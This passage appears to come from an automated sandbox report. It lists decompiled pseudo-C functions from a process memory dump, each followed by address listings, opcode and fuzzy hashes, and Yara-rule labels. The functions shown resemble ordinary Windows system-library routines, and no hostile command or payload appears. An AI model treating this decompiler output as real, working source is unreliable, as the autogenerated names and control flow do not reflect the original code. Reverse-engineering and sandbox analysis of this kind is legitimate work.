					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04B7A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                    0x04b7a61c
                                                    0x04b7a61e
                                                    0x04b7a623
                                                    0x04b7a628
                                                    0x04b7a62b
                                                    0x04b7a62d
                                                    0x04b7a648
                                                    0x04b7a64a
                                                    0x04b7a64f
                                                    0x04bb9b44
                                                    0x04b7a6ec
                                                    0x04b7a6f1
                                                    0x04b7a6f1
                                                    0x04b7a655
                                                    0x04b7a657
                                                    0x04b7a65a
                                                    0x04b7a65d
                                                    0x04b7a662
                                                    0x04b7a663
                                                    0x04b7a667
                                                    0x04b7a668
                                                    0x04b7a66d
                                                    0x04b7a706
                                                    0x04b7a706
                                                    0x04bb9bda
                                                    0x04bb9be6
                                                    0x04bb9beb
                                                    0x00000000
                                                    0x04bb9beb
                                                    0x04b7a679
                                                    0x04bb9b7a
                                                    0x00000000
                                                    0x04bb9b7a
                                                    0x04b7a683
                                                    0x04b7a6f4
                                                    0x04b7a6f7
                                                    0x04b7a6f9
                                                    0x04b7a6fd
                                                    0x04b7a6a0
                                                    0x04b7a6a0
                                                    0x04b7a6ad
                                                    0x04b7a6af
                                                    0x04b7a6b4
                                                    0x04bb9ba7
                                                    0x04bb9bac
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb9bc6
                                                    0x04bb9bce
                                                    0x04bb9bd1
                                                    0x04bb9bd3
                                                    0x04bb9bd3
                                                    0x00000000
                                                    0x04bb9bd1
                                                    0x04b7a6bd
                                                    0x04b7a6c3
                                                    0x04b7a6c6
                                                    0x04b7a6d2
                                                    0x04b7a701
                                                    0x04b7a704
                                                    0x00000000
                                                    0x04b7a704
                                                    0x04b7a6d4
                                                    0x04b7a6d6
                                                    0x04b7a6d9
                                                    0x04b7a6db
                                                    0x04b7a6e1
                                                    0x04b7a6e6
                                                    0x04b7a6e8
                                                    0x04b7a6e8
                                                    0x04b7a6ea
                                                    0x00000000
                                                    0x04b7a6ea
                                                    0x04b7a688
                                                    0x04b7a692
                                                    0x04b7a694
                                                    0x04b7a699
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7a69d
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8858e0cd2d74cecc9c4ff00b95f6bb282cbd2372133122c1a7e51e66e48eeb07
                                                    • Instruction ID: eef308e43f232325f7f0ddc61c6f2259058af860c4e068045f008f44e82d0df3
                                                    • Opcode Fuzzy Hash: 8858e0cd2d74cecc9c4ff00b95f6bb282cbd2372133122c1a7e51e66e48eeb07
                                                    • Instruction Fuzzy Hash: 6E4145B5A00209DFDB54CF68D890BAEBBF2FB49314F1580A9E914AB344D778BD01CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC7016, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E04BC7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4c3d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04BC6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04BC6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04B67D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04B89AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04B8B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04B64620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                    0x04bc7016
                                                    0x04bc701e
                                                    0x04bc702b
                                                    0x04bc7033
                                                    0x04bc7037
                                                    0x04bc703c
                                                    0x04bc703e
                                                    0x04bc7041
                                                    0x04bc7045
                                                    0x04bc704a
                                                    0x04bc7050
                                                    0x04bc7055
                                                    0x04bc705a
                                                    0x04bc7062
                                                    0x04bc7062
                                                    0x04bc705a
                                                    0x04bc7064
                                                    0x04bc7064
                                                    0x04bc7067
                                                    0x04bc7071
                                                    0x04bc7096
                                                    0x04bc709b
                                                    0x04bc70a2
                                                    0x04bc70a6
                                                    0x04bc70a7
                                                    0x04bc70ad
                                                    0x04bc70b3
                                                    0x04bc70b6
                                                    0x04bc70bb
                                                    0x04bc70c3
                                                    0x04bc70c3
                                                    0x04bc70c6
                                                    0x04bc70cd
                                                    0x04bc70dd
                                                    0x04bc70e0
                                                    0x04bc70e2
                                                    0x04bc70e2
                                                    0x04bc70ee
                                                    0x04bc7101
                                                    0x04bc70f0
                                                    0x04bc70f9
                                                    0x04bc70f9
                                                    0x04bc710a
                                                    0x04bc710e
                                                    0x04bc7112
                                                    0x04bc7117
                                                    0x04bc7118
                                                    0x04bc7118
                                                    0x04bc70bb
                                                    0x04bc711d
                                                    0x04bc7123
                                                    0x04bc7131
                                                    0x04bc7131
                                                    0x04bc7136
                                                    0x04bc713d
                                                    0x04bc713e
                                                    0x04bc713f
                                                    0x04bc714a
                                                    0x04bc714a
                                                    0x04bc7084
                                                    0x04bc7088
                                                    0x00000000
                                                    0x04bc708e
                                                    0x04bc708e
                                                    0x04bc7092
                                                    0x00000000
                                                    0x04bc7092

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59ec3b52da989e1d9cd69b97358587f33ee11e8bc0a05aa9a7261c872539d557
                                                    • Instruction ID: 5e62536eee4a53ff0f074914387b58ae1b367cec755786b329695d9f8fc9fbb1
                                                    • Opcode Fuzzy Hash: 59ec3b52da989e1d9cd69b97358587f33ee11e8bc0a05aa9a7261c872539d557
                                                    • Instruction Fuzzy Hash: FC31A2726047529BC320DF68C981A6AB7E9FF88700F044A6DF89587690EB34F914CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6C182, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E04B6C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04B67D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04C18D34(_v8, _t80);
					}
					E04B62280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04B5FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04C18833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04B5FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04B8B180();
						if(_a4 != 0) {
							E04B62280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04B6BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04B6BB2D(_t16, _t15);
						E04B6B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04B5FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04B5FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04B5FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                    0x04b6c18d
                                                    0x04b6c18f
                                                    0x04b6c191
                                                    0x04b6c19b
                                                    0x04b6c1a0
                                                    0x04b6c1d4
                                                    0x04b6c1de
                                                    0x04bb2d6e
                                                    0x04b6c1e4
                                                    0x04b6c1e4
                                                    0x04b6c1e4
                                                    0x04b6c1ec
                                                    0x04bb2d7d
                                                    0x04bb2d7d
                                                    0x04b6c1f3
                                                    0x04b6c1ff
                                                    0x04bb2d88
                                                    0x04bb2d8d
                                                    0x04bb2d94
                                                    0x04bb2d94
                                                    0x04bb2d9f
                                                    0x04bb2da4
                                                    0x04bb2dab
                                                    0x04bb2db0
                                                    0x04bb2db2
                                                    0x04bb2db3
                                                    0x04bb2db4
                                                    0x04bb2dbc
                                                    0x04bb2dc3
                                                    0x04bb2dc3
                                                    0x04b6c205
                                                    0x04b6c205
                                                    0x04b6c208
                                                    0x04b6c20e
                                                    0x04b6c211
                                                    0x04b6c216
                                                    0x04b6c219
                                                    0x04b6c21f
                                                    0x04b6c222
                                                    0x04b6c22c
                                                    0x04b6c234
                                                    0x04b6c23a
                                                    0x04b6c23f
                                                    0x04b6c245
                                                    0x04b6c24b
                                                    0x04b6c251
                                                    0x04b6c25a
                                                    0x04b6c276
                                                    0x04b6c27d
                                                    0x04b6c27d
                                                    0x04b6c25c
                                                    0x04b6c25c
                                                    0x00000000
                                                    0x04b6c25e
                                                    0x04b6c1a4
                                                    0x04b6c1aa
                                                    0x04b6c1b3
                                                    0x04b6c265
                                                    0x04b6c26c
                                                    0x04b6c26c
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: e6f6dd33c5f7013cc1e6eef37941bb9dbfd42482c65eec31f434ec1bfa8ad2da
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: E1311671705646AAEB04EBB4C480BF9FB64FF52248F0441DAD95987241DB3C7A19EBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7A70E, Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E04B7A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4c37b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4c37b10 = 8;
					 *0x4c37b14 = 0x4c37b0c;
					 *0x4c37b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04B7A990(0x4c37b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04B7A840(__edx, __ecx, __ecx, _t52, 0x4c37b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4c37b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4c37b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4c37b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04B64620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4c37b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04B8F3E0(_t50,  *0x4c37b14, _t8 >> 3);
						_t28 =  *0x4c37b14; // 0x77f07b0c
						__eflags = _t28 - 0x4c37b0c;
						if(_t28 != 0x4c37b0c) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4c37b14 = _t50;
						_t48 = _v12;
						 *0x4c37b10 = _t9;
						goto L6;
					}
					 *0x4c37b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                    0x04b7a713
                                                    0x04b7a714
                                                    0x04b7a717
                                                    0x04b7a71d
                                                    0x04b7a720
                                                    0x04b7a722
                                                    0x04b7a727
                                                    0x04b7a74a
                                                    0x04b7a754
                                                    0x04b7a75e
                                                    0x04b7a768
                                                    0x04b7a76a
                                                    0x04b7a773
                                                    0x04b7a78b
                                                    0x04b7a790
                                                    0x04b7a792
                                                    0x04b7a741
                                                    0x04b7a741
                                                    0x04b7a743
                                                    0x04b7a749
                                                    0x04b7a749
                                                    0x04b7a732
                                                    0x04b7a73a
                                                    0x04b7a797
                                                    0x04b7a79d
                                                    0x04b7a7a3
                                                    0x04b7a7a9
                                                    0x04b7a7b6
                                                    0x04b7a7bc
                                                    0x04b7a7ca
                                                    0x04b7a7e0
                                                    0x04b7a7e2
                                                    0x04b7a7e4
                                                    0x04bb9bf2
                                                    0x00000000
                                                    0x04bb9bf2
                                                    0x04b7a7ed
                                                    0x04b7a7f2
                                                    0x04b7a800
                                                    0x04b7a805
                                                    0x04b7a80d
                                                    0x04b7a812
                                                    0x04bb9c08
                                                    0x04bb9c08
                                                    0x04b7a818
                                                    0x04b7a81b
                                                    0x04b7a821
                                                    0x04b7a824
                                                    0x00000000
                                                    0x04b7a824
                                                    0x04b7a7ae
                                                    0x00000000
                                                    0x04b7a7ae
                                                    0x04b7a73c
                                                    0x04b7a73e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e0343e6d9349c4e6837288374fa06f6b23b2166c4a1b1be735be8409796b9b6
                                                    • Instruction ID: 2afa9088cffb82ee49365720db1fbb9a5e4d80dfac8c961b0ca84909f7c68ef4
                                                    • Opcode Fuzzy Hash: 2e0343e6d9349c4e6837288374fa06f6b23b2166c4a1b1be735be8409796b9b6
                                                    • Instruction Fuzzy Hash: D2318DF56012049BD751CF18D880F6A7BF9FB8971AF1489DAE02597240E7B8BD01CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B761A0, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E04B761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04B75E50(0x4b267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04C19D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04B4F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                    0x04b761b3
                                                    0x04b761b5
                                                    0x04b761bd
                                                    0x04b761c3
                                                    0x04b761c7
                                                    0x04b761d2
                                                    0x04b761ff
                                                    0x04b761ff
                                                    0x04b76201
                                                    0x04b76207
                                                    0x04b76207
                                                    0x04b761d4
                                                    0x04b761d9
                                                    0x00000000
                                                    0x00000000
                                                    0x04b761df
                                                    0x04b761e2
                                                    0x00000000
                                                    0x00000000
                                                    0x04b761e6
                                                    0x04b761e8
                                                    0x04b761ee
                                                    0x04b761ee
                                                    0x04b761f9
                                                    0x04bb762f
                                                    0x04bb7632
                                                    0x04bb7635
                                                    0x04bb7639
                                                    0x04bb7640
                                                    0x04bb766e
                                                    0x04bb7675
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7681
                                                    0x04bb7689
                                                    0x04bb768d
                                                    0x04bb7691
                                                    0x04bb7695
                                                    0x04bb7699
                                                    0x04bb76af
                                                    0x04bb76b5
                                                    0x04bb76b7
                                                    0x04bb76b7
                                                    0x04bb76d7
                                                    0x04bb76dc
                                                    0x00000000
                                                    0x04bb76dc
                                                    0x04bb76a2
                                                    0x04bb76a9
                                                    0x04bb7651
                                                    0x04bb7653
                                                    0x04bb7653
                                                    0x04bb7656
                                                    0x04bb7656
                                                    0x00000000
                                                    0x04bb7656
                                                    0x04bb7644
                                                    0x04bb7646
                                                    0x04bb7648
                                                    0x04bb7648
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f754a0d31ce6f2fca564b5fe86cf1afffb146146f76bb74884579763324b66ba
                                                    • Instruction ID: df664bcef062f13254797c18d2a4772f753ad934c93f1084f7ee557811ddbf39
                                                    • Opcode Fuzzy Hash: f754a0d31ce6f2fca564b5fe86cf1afffb146146f76bb74884579763324b66ba
                                                    • Instruction Fuzzy Hash: 1A318D716097018FD360DF19C904B6AB7E5FB88B10F0949ADE9999B761EBB0FC04CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4AA16, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E04B4AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4c3d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4c37b9c; // 0x0
					_t53 = L04B64620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04B8B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04B8F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04B56C59(_t53, _t51, _t58) != 0) {
							_t28 = E04B75E50(0x4b2c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04B7B230(_v32, _v28, 0x4b2c2d8, 1,  &_v24);
								_t28 = E04B4F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                    0x04b4aa25
                                                    0x04b4aa29
                                                    0x04b4aa2d
                                                    0x04b4aa30
                                                    0x04b4aa37
                                                    0x04b4aa3c
                                                    0x04ba4458
                                                    0x04ba4458
                                                    0x04ba4472
                                                    0x04ba4474
                                                    0x04ba4476
                                                    0x04b4aa64
                                                    0x04b4aa74
                                                    0x04ba447c
                                                    0x04ba4483
                                                    0x04ba4492
                                                    0x04b4aa52
                                                    0x04b4aa54
                                                    0x04b4aa5e
                                                    0x04ba44a8
                                                    0x04ba44ad
                                                    0x04ba44af
                                                    0x04ba44b6
                                                    0x04ba44b6
                                                    0x04ba44b9
                                                    0x04ba44bc
                                                    0x04ba44cd
                                                    0x04ba44d3
                                                    0x04ba44d6
                                                    0x04ba44e1
                                                    0x04ba44e1
                                                    0x04ba44e6
                                                    0x04ba44e8
                                                    0x04ba44fb
                                                    0x04ba44fb
                                                    0x04ba44e8
                                                    0x00000000
                                                    0x04b4aa5e
                                                    0x04ba4476
                                                    0x04b4aa42
                                                    0x04b4aa46
                                                    0x04b4aa48
                                                    0x04b4aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c76a93ab008b7aa3fe68fe2a392e70db18c63bf52d88973e4f25e4f7abf2dd5
                                                    • Instruction ID: 416514325ba5688d56fb77055b92f951ce721b4bf121500295087c9e4c07b778
                                                    • Opcode Fuzzy Hash: 7c76a93ab008b7aa3fe68fe2a392e70db18c63bf52d88973e4f25e4f7abf2dd5
                                                    • Instruction Fuzzy Hash: E131C571A00119ABDF109F68CD81A7FB7B9EF48704F0144A9F905D7150EB78BD11DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B88EC7, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E04B88EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4c3d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04B74E70(0x4c386e4, 0x4b89490, 0, 0);
					if( *0x4c353e8 > 5 && E04B88F33(0x4c353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4c353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4c353e8;
						_v32 = 0;
